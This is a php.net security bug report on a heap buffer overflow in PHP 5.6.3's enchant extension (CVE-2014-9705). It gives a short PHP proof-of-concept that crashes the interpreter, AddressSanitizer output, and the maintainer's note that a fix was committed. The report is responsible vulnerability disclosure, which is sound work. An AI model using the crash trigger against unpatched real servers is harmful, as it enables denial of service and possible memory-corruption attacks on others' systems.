php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #68552 heap buffer overflow in enchant_broker_request_dict()
Submitted: 2014-12-05 13:15 UTC Modified: 2015-03-18 12:11 UTC
From: advisory at htbridge dot ch Assigned: tony2001
Status: Closed Package: Reproducible crash
PHP Version: 5.6.3 OS: Ubuntu 14.04.1 LTS 32bit
Private report: No CVE-ID: 2014-9705
 [2014-12-05 13:15 UTC] advisory at htbridge dot ch
Description:
------------
The following test case crashes php as it tries to read invalid memory.

The write heap overflow from ASAN is not always reproducible - you need to run the test case a couple of times to get it.

Affects also 64-bit systems.

PoC
========

<?php
$tag = 'en_US';
$r = enchant_broker_init();
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);
?>


Result:
========
[Fri Dec  5 13:32:59 2014]  Script:  '/home/symeon/Desktop/dict.php'
---------------------------------------
/home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c(554) : Block 0xb3256a2c status:
Beginning:      OK (allocated on /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:554, 4 bytes)
    Start:  OK
      End:  Overflown (magic=0x00000034 instead of 0xAF9A0F68)
            At least 4 bytes overflown
---------------------------------------
=================================================================
==4350== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xaf9a0f78 at pc 0x84ee4e8 bp 0xbffa7a78 sp 0xbffa7a6c
WRITE of size 4 at 0xaf9a0f78 thread T0
    #0 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
    #1 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
    #2 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
    #3 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
    #4 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
    #5 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
    #6 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
    #7 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
    #8 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
    #9 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
    #10 0x807d080 in _start ??:?
0xaf9a0f78 is located 248 bytes to the right of 0-byte region [0xaf9a0e80,0xaf9a0e80)
==4350== AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_allocator2.cc:216 "((id)) != (0)" (0x0, 0x0)
    #0 0xb617d4b2 in _ZdaPvRKSt9nothrow_t ??:?
    #1 0xb61860cc in _ZN11__sanitizer11CheckFailedEPKciS1_yy ??:?
    #2 0xb616ef1e in ?? ??:0
    #3 0xb61836d3 in __asan_unpoison_stack_memory ??:?
    #4 0xb6184b7f in __asan_report_error ??:?
    #5 0xb617db2e in __asan_report_store4 ??:?
    #6 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
    #7 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
    #8 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
    #9 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
    #10 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
    #11 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
    #12 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
    #13 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
    #14 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
    #15 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287


Regards,
S. Paraschoudis




Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2014-12-19 09:27 UTC] advisory at htbridge dot ch
Did anyone have time to review and confirm the issue?
 [2015-01-26 10:19 UTC] advisory at htbridge dot ch
Friendly reminder, can someone please review it?
Thank you.
 [2015-01-26 11:50 UTC] tony2001@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: tony2001
 [2015-01-26 11:50 UTC] tony2001@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.

Pushed a fix to SVN, thanks!
http://svn.php.net/viewvc/pecl/enchant/trunk/enchant.c?r1=317600&r2=335803
 [2015-03-18 12:11 UTC] kaplan@php.net
-CVE-ID: +CVE-ID: 2014-9705
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Sun Feb 26 14:01:37 2017 UTC